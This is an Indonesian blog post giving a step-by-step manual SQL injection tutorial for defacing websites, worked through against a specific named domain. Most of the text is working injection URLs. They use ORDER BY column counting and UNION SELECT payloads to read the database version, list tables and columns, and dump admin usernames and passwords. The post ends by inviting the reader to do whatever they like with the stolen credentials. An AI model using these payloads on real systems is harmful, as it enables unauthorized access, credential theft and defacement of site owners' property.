Uncategories cara deface dengan SQLi manual 2014 (new)

cara deface dengan SQLi manual 2014 (new)

5:05 AM
cari dlu targetnya dengan Dork :v
taruh tanda petik ( ' ) di bagian belakang website

ex : http://gree.co.id/news_detail.php?id=1'
SS : http://prntscr.com/36dy41

jika error ""Error In Your SQL Syntax atau Warning: mysql_fetch_array() expects parameter 1 to be resource" dan sebagainya, berarti itu vuln. Ok selanjutnya

ubah URLnya seperti ini ex : http://gree.co.id/news_detail.php?id=-1+order+by+2--              <== belum error
SS : http://prntscr.com/36dyv8
jika blm error, lanjut terus sampe ada error
ex : http://gree.co.id/news_detail.php?id=-1+order+by+11--     <== Error
SS : http://prntscr.com/36dzlq

berarti coloum pada website tersebut ada 10.
jika errornya pada angka 12, berarti coloumnya 11 
selanjutnya
karena coloumnya ada 10, maka ubah URL menjadi seperti ini
ex : http://gree.co.id/news_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10--
kan muncul beberapa angka tuhSS : http://prntscr.com/36e103 
pilih salah satu, kemudian ubah menjadi
ex : http://gree.co.id/news_detail.php?id=-1+union+select+1,@@version,3,4,5,6,7,8,9,10--
nah pada site tersebut terdapat versi database yang dipakai site tsb.SS: http://prntscr.com/36e25b
pada site itu ^, menggunakan versi 5, kalo 4 lumayan susah :D

sekarang ubah URLnya seperti ini :
http://gree.co.id/news_detail.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--

nah itu muncul nama-nama table
SS: http://prntscr.com/36e3bb

cari table yang berbau admin/user. pada site ini tablenya adalah td_user_admin.
pada tahap ini nama td_user_admin harus di konvensi ke bentuk decimal. ini toolsnya Disini..! . kemudian hasil konvensi dari td_user_admin adalah 116 100 95 117 115 101 114 95 97 100 109 105 110 . Lalu pindahkan ke CHAR(116, 100, 95, 117, 115, 101, 114, 95, 97, 100, 109, 105, 110) dan dipisahkan dengan tanda koma.

contohnya sebagai berikut :
http://gree.co.id/news_detail.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=CHAR(116, 100, 95, 117, 115, 101, 114, 95, 97, 100, 109, 105, 110)--
nah kan muncul nama-nama coloumnya tuh
SS : http://prntscr.com/36e88a

selanjutnya pada site ini, kita menambah perintah group_concat(USER_NAME,0x3a,PASSWORD)
lalu tambahkan perintah ...+from+ td_user_admin
Ex :
http://gree.co.id/news_detail.php?id=-1+union+select+1,group_concat(USER_NAME,0x3a,PASSWORD),3,4,5,6,7,8,9,10+from+td_user_admin

SS : http://prntscr.com/36ea0x
nah tuh udh nongol username dan passwordnya, terserah dehh mau diapain :v


Source: IDCA reedited UCI 
sorry kalo ada yang enggak jelas :v
thank's you :v
Next
« Prev Post
Previous
Next Post »
Subscribe to: Post Comments (Atom)